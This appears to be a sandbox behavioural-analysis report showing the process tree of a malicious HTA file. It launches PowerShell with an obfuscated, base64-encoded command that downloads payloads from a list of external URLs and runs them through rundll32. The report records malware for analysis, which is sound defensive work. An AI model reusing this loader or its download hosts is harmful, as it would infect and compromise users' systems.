popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Njguoo.hta

    3048

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAUgBhAGQAaQBvAHMAZQBuAHMAaQB0AGkAdgBpAHQAeQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGMAaQB0AHkAdABlAGMAaAAtAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALwA2AE0AaAAxAGsALwBCADcARQBIAHMAYgBVAFgAcQBrAGYALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwB0AHYAYgBqAFMALABoAHQAdABwAHMAOgAvAC8AYwBhAHIAbABhAGQAdgBvAGcAYQBkAGEAdAByAGkAYgB1AHQAYQByAGkAYQAuAGMAbwBtAC8AdAB2AG4AcQA5AC8AVABIAFcAawBMACwAaAB0AHQAcABzADoALwAvAG0AcgBjAHIAaQB6AHEAdQBuAGEALgBjAG8AbQAvAEwANwBjAGMATgAvAFAAaQBmAGoASgA3ADUAaAAzACwAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwA3AHkARAB6AFoAVwAsAGgAdAB0AHAAcwA6AC8ALwBuAGEAeQBhAGQAbwBmAG8AdQBuAGQAYQB0AGkAbwBuAC4AbwByAGcALwB3AFgAYQBLAG0ALwBFAEQAdABtAEcAcgBMACwAaAB0AHQAcABzADoALwAvAGcAcwBzAGMAbwByAHAAbwByAGEAdABpAG8AbgBsAHQAZAAuAGMAbwBtAC8AbwBrAFMAZgBqAC8AZwBkAE8AcQBWAGMAcwBjAGYAeAAsAGgAdAB0AHAAcwA6AC8ALwB6AGEAaQBuAGMAbwAuAG4AZQB0AC8ATwBkAE8AVQAvADkAUwA2AG8AWgBXADgAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBwAHMAdwBlAHAAdAAgAGkAbgAgACQAUgBhAGQAaQBvAHMAZQBuAHMAaQB0AGkAdgBpAHQAeQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAVQBwAHMAdwBlAHAAdAAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZABpAGYAZgBlAHIAZQBuAHQAaQBhAGwAcwAuAHUAbgBjAG8AbQBpAGMAYQBsAEYAbwByAGUAYwBvAG0AbQBlAG4AZAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAGQAaQBmAGYAZQByAGUAbgB0AGkAYQBsAHMALgB1AG4AYwBvAG0AaQBjAGEAbABGAG8AcgBlAGMAbwBtAG0AZQBuAGQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAFEAQQBSAFEAQgBOAEEARgBBAEEAWABBAEIAawBBAEcAawBBAFoAZwBCAG0AQQBHAFUAQQBjAGcAQgBsAEEARwA0AEEAZABBAEIAcABBAEcARQBBAGIAQQBCAHoAQQBDADQAQQBkAFEAQgB1AEEARwBNAEEAYgB3AEIAdABBAEcAawBBAFkAdwBCAGgAQQBHAHcAQQBSAGcAQgB2AEEASABJAEEAWgBRAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAFUAQQBiAGcAQgBrAEEAQwB3AEEAVABRAEIAdgBBAEgAUQBBAFoAQQBBADcAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="

      2184

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf